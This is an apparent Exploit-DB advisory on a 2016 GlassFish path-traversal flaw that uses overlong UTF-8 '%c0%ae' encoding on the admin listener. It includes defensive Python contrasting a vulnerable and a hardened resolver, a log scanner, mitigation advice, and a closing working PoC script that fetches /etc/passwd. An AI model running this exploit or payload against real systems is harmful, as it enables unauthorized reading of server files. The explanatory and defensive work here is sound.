Vendor: GlassFish Server
Author: bingbing
Vulnerability Type: Arbitrary file read
CVSS: 8.8 (HIGH)
CWE: 22 (Path Traversal)
Product Name: GlassFish Server
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: glassfish
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux x86
Year: 2016

glassfish Arbitrary file read vulnerability

GlassFish Server is vulnerable to an arbitrary file read (path traversal) because the path check on static resources under /theme/ on the administration listener (port 4848 in the PoC) does not reject overlong UTF-8 sequences. The PoC below replaces each dot of a ".." segment with %c0%ae, an invalid two-byte encoding of "." (0x2E), so the request contains no literal ".." for the check to match, yet the sequence still resolves to ".." when the path is decoded and the file is read. An unauthenticated attacker who can reach the listener can read any file the GlassFish process has permission to read, /etc/passwd in the PoC.
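The following is an added illustration, not code from the Exploit-DB entry or from GlassFish, of why the overlong encoding works and what a correct check looks like. It models a static-file handler with a vulnerable resolver (a ".." check on the encoded string, followed by a decoder that tolerates overlong forms) next to a hardened one (strict UTF-8 decode, then containment check on the normalized absolute path), and finishes with a small scan over constructed access-log lines that flags both encoded and plain traversal attempts. The document root, the payload shape and the log lines are assumptions for the demo; the real GlassFish code paths are not reproduced here.

```python
import posixpath
import re
from typing import List, Optional
from urllib.parse import unquote_to_bytes

# Hypothetical document root for the /theme/ resources; not a real GlassFish path.
ROOT = "/srv/www/theme"

# Same traversal shape as the PoC, relative to ROOT: ten overlong-encoded '..'
# segments below META-INF, then /etc/passwd.
PAYLOAD = "META-INF" + "/%c0%ae%c0%ae" * 10 + "/etc/passwd"


def decode_overlong_utf8(data: bytes) -> str:
    """Lenient decoder that accepts 2-byte overlong forms (lead bytes C0/C1),
    which the UTF-8 spec forbids. 0xC0 0xAE decodes to U+002E, '.', so
    '%c0%ae%c0%ae' becomes '..'. All other bytes are mapped 1:1 (Latin-1)
    to keep the demo short."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def resolve_vulnerable(root: str, request_path: str) -> Optional[str]:
    """Checks for '..' on the raw request string, then decodes leniently.
    The check never sees a dot, so the traversal survives."""
    if ".." in request_path:
        return None
    decoded = decode_overlong_utf8(unquote_to_bytes(request_path))
    return posixpath.normpath(posixpath.join(root, decoded))


def resolve_hardened(root: str, request_path: str) -> Optional[str]:
    """Strict UTF-8 decode (overlong forms raise), then check containment on
    the fully normalized absolute path rather than on the encoded string."""
    try:
        decoded = unquote_to_bytes(request_path).decode("utf-8")
    except UnicodeDecodeError:
        return None
    if "\x00" in decoded:
        return None
    full = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if full != root and not full.startswith(root + "/"):
        return None
    return full


# Constructed access-log lines in common log format; not from a real server.
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Jan/2016:10:01:02 +0000] "GET /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1" 200 1823',
    '10.0.0.7 - - [15/Jan/2016:10:01:09 +0000] "GET /theme/css/style.css HTTP/1.1" 200 4090',
    '10.0.0.9 - - [15/Jan/2016:10:02:30 +0000] "GET /theme/../../etc/passwd HTTP/1.1" 404 0',
]


def flag_traversal_requests(lines: List[str]) -> List[str]:
    """Return log lines whose request path contains a '..' segment after
    percent-decoding, decoding overlong sequences the way the vulnerable
    server would, so encoded and plain traversal attempts are both caught."""
    hits = []
    for line in lines:
        m = re.search(r'"[A-Z]+ (\S+) HTTP/', line)
        if not m:
            continue
        decoded = decode_overlong_utf8(unquote_to_bytes(m.group(1)))
        if ".." in decoded.split("/"):
            hits.append(line)
    return hits


if __name__ == "__main__":
    print("vulnerable :", resolve_vulnerable(ROOT, PAYLOAD))
    print("hardened   :", resolve_hardened(ROOT, PAYLOAD))
    for hit in flag_traversal_requests(SAMPLE_LOG):
        print("flagged    :", hit)
```

The design point is the order of operations: the vulnerable resolver validates before it has finished decoding, so any encoding the later stage accepts but the check does not recognise is a bypass. The hardened resolver decodes first with a strict decoder, normalizes, and only then compares the result against the root. The log scan applies the same lenient decoding deliberately, because a detector has to see the path the way the vulnerable server did.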

Mitigation:

Upgrade to the latest version of GlassFish Server. Until the upgrade is in place, restrict access to the administration listener (port 4848 in the PoC) to trusted hosts or loopback, since the request needs no credentials. To verify the fix, replay the PoC request against the patched instance: it is fixed when the response no longer contains the contents of /etc/passwd.

Exploit-DB raw data:

# Title: glassfish Arbitrary file read vulnerability
# Date : 01/15/2016
# Author: bingbing
# Software link: https://glassfish.java.net/download.html
# Software: GlassFish Server
# Tested: Linux x86


#!/usr/bin/env python3
# PoC: fetch /etc/passwd through the GlassFish admin listener (port 4848).
# Each dot of '..' is sent as %c0%ae, an overlong UTF-8 encoding of '.',
# so the traversal is not caught by the server's path check.
# Usage: python3 poc.py [http://host:4848]   (defaults to localhost)
import sys
import urllib.request

base = sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:4848'
traversal = '/%c0%ae%c0%ae' * 10          # ten encoded '..' segments
url = base + '/theme/META-INF' + traversal + '/etc/passwd'
response = urllib.request.urlopen(url)
print(response.read().decode('utf-8', 'replace'))